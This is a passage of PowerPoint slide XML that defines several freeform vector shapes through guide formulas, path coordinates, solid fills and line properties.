                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10760" name="Freeform 167"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1291" y="2238"/>
                <a:ext cx="79" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 79"/>
                  <a:gd name="T1" fmla="*/ 15 h 15"/>
                  <a:gd name="T2" fmla="*/ 0 w 79"/>
                  <a:gd name="T3" fmla="*/ 15 h 15"/>
                  <a:gd name="T4" fmla="*/ 3 w 79"/>
                  <a:gd name="T5" fmla="*/ 14 h 15"/>
                  <a:gd name="T6" fmla="*/ 4 w 79"/>
                  <a:gd name="T7" fmla="*/ 14 h 15"/>
                  <a:gd name="T8" fmla="*/ 7 w 79"/>
                  <a:gd name="T9" fmla="*/ 13 h 15"/>
                  <a:gd name="T10" fmla="*/ 11 w 79"/>
                  <a:gd name="T11" fmla="*/ 12 h 15"/>
                  <a:gd name="T12" fmla="*/ 14 w 79"/>
                  <a:gd name="T13" fmla="*/ 11 h 15"/>
                  <a:gd name="T14" fmla="*/ 19 w 79"/>
                  <a:gd name="T15" fmla="*/ 9 h 15"/>
                  <a:gd name="T16" fmla="*/ 24 w 79"/>
                  <a:gd name="T17" fmla="*/ 8 h 15"/>
                  <a:gd name="T18" fmla="*/ 30 w 79"/>
                  <a:gd name="T19" fmla="*/ 8 h 15"/>
                  <a:gd name="T20" fmla="*/ 35 w 79"/>
                  <a:gd name="T21" fmla="*/ 7 h 15"/>
                  <a:gd name="T22" fmla="*/ 42 w 79"/>
                  <a:gd name="T23" fmla="*/ 7 h 15"/>
                  <a:gd name="T24" fmla="*/ 48 w 79"/>
                  <a:gd name="T25" fmla="*/ 6 h 15"/>
                  <a:gd name="T26" fmla="*/ 55 w 79"/>
                  <a:gd name="T27" fmla="*/ 7 h 15"/>
                  <a:gd name="T28" fmla="*/ 62 w 79"/>
                  <a:gd name="T29" fmla="*/ 7 h 15"/>
                  <a:gd name="T30" fmla="*/ 69 w 79"/>
                  <a:gd name="T31" fmla="*/ 8 h 15"/>
                  <a:gd name="T32" fmla="*/ 76 w 79"/>
                  <a:gd name="T33" fmla="*/ 9 h 15"/>
                  <a:gd name="T34" fmla="*/ 79 w 79"/>
                  <a:gd name="T35" fmla="*/ 0 h 15"/>
                  <a:gd name="T36" fmla="*/ 79 w 79"/>
                  <a:gd name="T37" fmla="*/ 0 h 15"/>
                  <a:gd name="T38" fmla="*/ 76 w 79"/>
                  <a:gd name="T39" fmla="*/ 0 h 15"/>
                  <a:gd name="T40" fmla="*/ 74 w 79"/>
                  <a:gd name="T41" fmla="*/ 0 h 15"/>
                  <a:gd name="T42" fmla="*/ 70 w 79"/>
                  <a:gd name="T43" fmla="*/ 0 h 15"/>
                  <a:gd name="T44" fmla="*/ 66 w 79"/>
                  <a:gd name="T45" fmla="*/ 0 h 15"/>
                  <a:gd name="T46" fmla="*/ 61 w 79"/>
                  <a:gd name="T47" fmla="*/ 0 h 15"/>
                  <a:gd name="T48" fmla="*/ 56 w 79"/>
                  <a:gd name="T49" fmla="*/ 0 h 15"/>
                  <a:gd name="T50" fmla="*/ 51 w 79"/>
                  <a:gd name="T51" fmla="*/ 1 h 15"/>
                  <a:gd name="T52" fmla="*/ 44 w 79"/>
                  <a:gd name="T53" fmla="*/ 1 h 15"/>
                  <a:gd name="T54" fmla="*/ 38 w 79"/>
                  <a:gd name="T55" fmla="*/ 1 h 15"/>
                  <a:gd name="T56" fmla="*/ 31 w 79"/>
                  <a:gd name="T57" fmla="*/ 2 h 15"/>
                  <a:gd name="T58" fmla="*/ 25 w 79"/>
                  <a:gd name="T59" fmla="*/ 4 h 15"/>
                  <a:gd name="T60" fmla="*/ 18 w 79"/>
                  <a:gd name="T61" fmla="*/ 5 h 15"/>
                  <a:gd name="T62" fmla="*/ 12 w 79"/>
                  <a:gd name="T63" fmla="*/ 6 h 15"/>
                  <a:gd name="T64" fmla="*/ 6 w 79"/>
                  <a:gd name="T65" fmla="*/ 7 h 15"/>
                  <a:gd name="T66" fmla="*/ 0 w 79"/>
                  <a:gd name="T67" fmla="*/ 8 h 15"/>
                  <a:gd name="T68" fmla="*/ 0 w 79"/>
                  <a:gd name="T69" fmla="*/ 15 h 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9"/>
                  <a:gd name="T106" fmla="*/ 0 h 15"/>
                  <a:gd name="T107" fmla="*/ 79 w 79"/>
                  <a:gd name="T108" fmla="*/ 15 h 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9" h="15">
                    <a:moveTo>
                      <a:pt x="0" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10761" name="Freeform 168"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1246" y="2379"/>
                <a:ext cx="132" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 132"/>
                  <a:gd name="T1" fmla="*/ 44 h 45"/>
                  <a:gd name="T2" fmla="*/ 56 w 132"/>
                  <a:gd name="T3" fmla="*/ 42 h 45"/>
                  <a:gd name="T4" fmla="*/ 56 w 132"/>
                  <a:gd name="T5" fmla="*/ 42 h 45"/>
                  <a:gd name="T6" fmla="*/ 57 w 132"/>
                  <a:gd name="T7" fmla="*/ 42 h 45"/>
                  <a:gd name="T8" fmla="*/ 59 w 132"/>
                  <a:gd name="T9" fmla="*/ 41 h 45"/>
                  <a:gd name="T10" fmla="*/ 61 w 132"/>
                  <a:gd name="T11" fmla="*/ 41 h 45"/>
                  <a:gd name="T12" fmla="*/ 63 w 132"/>
                  <a:gd name="T13" fmla="*/ 40 h 45"/>
                  <a:gd name="T14" fmla="*/ 65 w 132"/>
                  <a:gd name="T15" fmla="*/ 39 h 45"/>
                  <a:gd name="T16" fmla="*/ 68 w 132"/>
                  <a:gd name="T17" fmla="*/ 38 h 45"/>
                  <a:gd name="T18" fmla="*/ 71 w 132"/>
                  <a:gd name="T19" fmla="*/ 37 h 45"/>
                  <a:gd name="T20" fmla="*/ 73 w 132"/>
                  <a:gd name="T21" fmla="*/ 34 h 45"/>
                  <a:gd name="T22" fmla="*/ 76 w 132"/>
                  <a:gd name="T23" fmla="*/ 33 h 45"/>
                  <a:gd name="T24" fmla="*/ 78 w 132"/>
                  <a:gd name="T25" fmla="*/ 31 h 45"/>
                  <a:gd name="T26" fmla="*/ 80 w 132"/>
                  <a:gd name="T27" fmla="*/ 30 h 45"/>
                  <a:gd name="T28" fmla="*/ 82 w 132"/>
                  <a:gd name="T29" fmla="*/ 27 h 45"/>
                  <a:gd name="T30" fmla="*/ 84 w 132"/>
                  <a:gd name="T31" fmla="*/ 26 h 45"/>
                  <a:gd name="T32" fmla="*/ 85 w 132"/>
                  <a:gd name="T33" fmla="*/ 24 h 45"/>
                  <a:gd name="T34" fmla="*/ 0 w 132"/>
                  <a:gd name="T35" fmla="*/ 3 h 45"/>
                  <a:gd name="T36" fmla="*/ 6 w 132"/>
                  <a:gd name="T37" fmla="*/ 0 h 45"/>
                  <a:gd name="T38" fmla="*/ 132 w 132"/>
                  <a:gd name="T39" fmla="*/ 32 h 45"/>
                  <a:gd name="T40" fmla="*/ 126 w 132"/>
                  <a:gd name="T41" fmla="*/ 34 h 45"/>
                  <a:gd name="T42" fmla="*/ 90 w 132"/>
                  <a:gd name="T43" fmla="*/ 25 h 45"/>
                  <a:gd name="T44" fmla="*/ 90 w 132"/>
                  <a:gd name="T45" fmla="*/ 25 h 45"/>
                  <a:gd name="T46" fmla="*/ 90 w 132"/>
                  <a:gd name="T47" fmla="*/ 26 h 45"/>
                  <a:gd name="T48" fmla="*/ 89 w 132"/>
                  <a:gd name="T49" fmla="*/ 26 h 45"/>
                  <a:gd name="T50" fmla="*/ 89 w 132"/>
                  <a:gd name="T51" fmla="*/ 27 h 45"/>
                  <a:gd name="T52" fmla="*/ 87 w 132"/>
                  <a:gd name="T53" fmla="*/ 28 h 45"/>
                  <a:gd name="T54" fmla="*/ 86 w 132"/>
                  <a:gd name="T55" fmla="*/ 30 h 45"/>
                  <a:gd name="T56" fmla="*/ 85 w 132"/>
                  <a:gd name="T57" fmla="*/ 31 h 45"/>
                  <a:gd name="T58" fmla="*/ 83 w 132"/>
                  <a:gd name="T59" fmla="*/ 32 h 45"/>
                  <a:gd name="T60" fmla="*/ 80 w 132"/>
                  <a:gd name="T61" fmla="*/ 33 h 45"/>
                  <a:gd name="T62" fmla="*/ 78 w 132"/>
                  <a:gd name="T63" fmla="*/ 34 h 45"/>
                  <a:gd name="T64" fmla="*/ 76 w 132"/>
                  <a:gd name="T65" fmla="*/ 37 h 45"/>
                  <a:gd name="T66" fmla="*/ 72 w 132"/>
                  <a:gd name="T67" fmla="*/ 38 h 45"/>
                  <a:gd name="T68" fmla="*/ 70 w 132"/>
                  <a:gd name="T69" fmla="*/ 40 h 45"/>
                  <a:gd name="T70" fmla="*/ 65 w 132"/>
                  <a:gd name="T71" fmla="*/ 41 h 45"/>
                  <a:gd name="T72" fmla="*/ 62 w 132"/>
                  <a:gd name="T73" fmla="*/ 42 h 45"/>
                  <a:gd name="T74" fmla="*/ 57 w 132"/>
                  <a:gd name="T75" fmla="*/ 45 h 45"/>
                  <a:gd name="T76" fmla="*/ 55 w 132"/>
                  <a:gd name="T77" fmla="*/ 44 h 4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45"/>
                  <a:gd name="T119" fmla="*/ 132 w 132"/>
                  <a:gd name="T120" fmla="*/ 45 h 4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45">
                    <a:moveTo>
                      <a:pt x="55" y="44"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="44"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10762" name="Freeform 169"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1218" y="2391"/>
                <a:ext cx="135" cy="40"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 135"/>
                  <a:gd name="T1" fmla="*/ 0 h 40"/>
                  <a:gd name="T2" fmla="*/ 132 w 135"/>
                  <a:gd name="T3" fmla="*/ 40 h 40"/>
                  <a:gd name="T4" fmla="*/ 135 w 135"/>
                  <a:gd name="T5" fmla="*/ 40 h 40"/>
                  <a:gd name="T6" fmla="*/ 5 w 135"/>
                  <a:gd name="T7" fmla="*/ 0 h 40"/>
                  <a:gd name="T8" fmla="*/ 0 w 135"/>
                  <a:gd name="T9" fmla="*/ 0 h 40"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 135"/>
                  <a:gd name="T16" fmla="*/ 0 h 40"/>
                  <a:gd name="T17" fmla="*/ 135 w 135"/>
                  <a:gd name="T18" fmla="*/ 40 h 40"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="135" h="40">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10763" name="Freeform 170"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1241" y="2385"/>
                <a:ext cx="132" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 132"/>
                  <a:gd name="T1" fmla="*/ 0 h 36"/>
                  <a:gd name="T2" fmla="*/ 130 w 132"/>
                  <a:gd name="T3" fmla="*/ 36 h 36"/>
                  <a:gd name="T4" fmla="*/ 132 w 132"/>
                  <a:gd name="T5" fmla="*/ 35 h 36"/>
                  <a:gd name="T6" fmla="*/ 4 w 132"/>
                  <a:gd name="T7" fmla="*/ 0 h 36"/>
                  <a:gd name="T8" fmla="*/ 0 w 132"/>
                  <a:gd name="T9" fmla="*/ 0 h 36"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 132"/>
                  <a:gd name="T16" fmla="*/ 0 h 36"/>
                  <a:gd name="T17" fmla="*/ 132 w 132"/>
                  <a:gd name="T18" fmla="*/ 36 h 36"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="132" h="36">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10764" name="Freeform 171"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2388"/>
                <a:ext cx="133" cy="38"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 133"/>
                  <a:gd name="T1" fmla="*/ 0 h 38"/>
                  <a:gd name="T2" fmla="*/ 130 w 133"/>
                  <a:gd name="T3" fmla="*/ 38 h 38"/>
                  <a:gd name="T4" fmla="*/ 133 w 133"/>
                  <a:gd name="T5" fmla="*/ 38 h 38"/>
                  <a:gd name="T6" fmla="*/ 3 w 133"/>
                  <a:gd name="T7" fmla="*/ 0 h 38"/>
                  <a:gd name="T8" fmla="*/ 0 w 133"/>
                  <a:gd name="T9" fmla="*/ 0 h 38"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 133"/>
                  <a:gd name="T16" fmla="*/ 0 h 38"/>
                  <a:gd name="T17" fmla="*/ 133 w 133"/>
                  <a:gd name="T18" fmla="*/ 38 h 38"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="133" h="38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10765" name="Freeform 172"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1792" y="2302"/>
                <a:ext cx="249" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 249"/>
                  <a:gd name="T1" fmla="*/ 14 h 209"/>
                  <a:gd name="T2" fmla="*/ 70 w 249"/>
                  <a:gd name="T3" fmla="*/ 14 h 209"/>
                  <a:gd name="T4" fmla="*/ 72 w 249"/>
                  <a:gd name="T5" fmla="*/ 14 h 209"/>
                  <a:gd name="T6" fmla="*/ 75 w 249"/>
                  <a:gd name="T7" fmla="*/ 13 h 209"/>
                  <a:gd name="T8" fmla="*/ 78 w 249"/>
                  <a:gd name="T9" fmla="*/ 12 h 209"/>
                  <a:gd name="T10" fmla="*/ 83 w 249"/>
                  <a:gd name="T11" fmla="*/ 11 h 209"/>
                  <a:gd name="T12" fmla="*/ 88 w 249"/>
                  <a:gd name="T13" fmla="*/ 10 h 209"/>
                  <a:gd name="T14" fmla="*/ 95 w 249"/>
                  <a:gd name="T15" fmla="*/ 8 h 209"/>
                  <a:gd name="T16" fmla="*/ 103 w 249"/>
                  <a:gd name="T17" fmla="*/ 6 h 209"/>
                  <a:gd name="T18" fmla="*/ 111 w 249"/>
                  <a:gd name="T19" fmla="*/ 5 h 209"/>
                  <a:gd name="T20" fmla="*/ 120 w 249"/>
                  <a:gd name="T21" fmla="*/ 4 h 209"/>
                  <a:gd name="T22" fmla="*/ 132 w 249"/>
                  <a:gd name="T23" fmla="*/ 3 h 209"/>
                  <a:gd name="T24" fmla="*/ 144 w 249"/>
                  <a:gd name="T25" fmla="*/ 1 h 209"/>
                  <a:gd name="T26" fmla="*/ 156 w 249"/>
                  <a:gd name="T27" fmla="*/ 0 h 209"/>
                  <a:gd name="T28" fmla="*/ 169 w 249"/>
                  <a:gd name="T29" fmla="*/ 0 h 209"/>
                  <a:gd name="T30" fmla="*/ 184 w 249"/>
                  <a:gd name="T31" fmla="*/ 0 h 209"/>
                  <a:gd name="T32" fmla="*/ 201 w 249"/>
                  <a:gd name="T33" fmla="*/ 0 h 209"/>
                  <a:gd name="T34" fmla="*/ 208 w 249"/>
                  <a:gd name="T35" fmla="*/ 28 h 209"/>
                  <a:gd name="T36" fmla="*/ 210 w 249"/>
                  <a:gd name="T37" fmla="*/ 29 h 209"/>
                  <a:gd name="T38" fmla="*/ 216 w 249"/>
                  <a:gd name="T39" fmla="*/ 34 h 209"/>
                  <a:gd name="T40" fmla="*/ 222 w 249"/>
                  <a:gd name="T41" fmla="*/ 40 h 209"/>
                  <a:gd name="T42" fmla="*/ 225 w 249"/>
                  <a:gd name="T43" fmla="*/ 51 h 209"/>
                  <a:gd name="T44" fmla="*/ 239 w 249"/>
                  <a:gd name="T45" fmla="*/ 117 h 209"/>
                  <a:gd name="T46" fmla="*/ 246 w 249"/>
                  <a:gd name="T47" fmla="*/ 145 h 209"/>
                  <a:gd name="T48" fmla="*/ 246 w 249"/>
                  <a:gd name="T49" fmla="*/ 146 h 209"/>
                  <a:gd name="T50" fmla="*/ 248 w 249"/>
                  <a:gd name="T51" fmla="*/ 152 h 209"/>
                  <a:gd name="T52" fmla="*/ 248 w 249"/>
                  <a:gd name="T53" fmla="*/ 160 h 209"/>
                  <a:gd name="T54" fmla="*/ 244 w 249"/>
                  <a:gd name="T55" fmla="*/ 171 h 209"/>
                  <a:gd name="T56" fmla="*/ 0 w 249"/>
                  <a:gd name="T57" fmla="*/ 164 h 209"/>
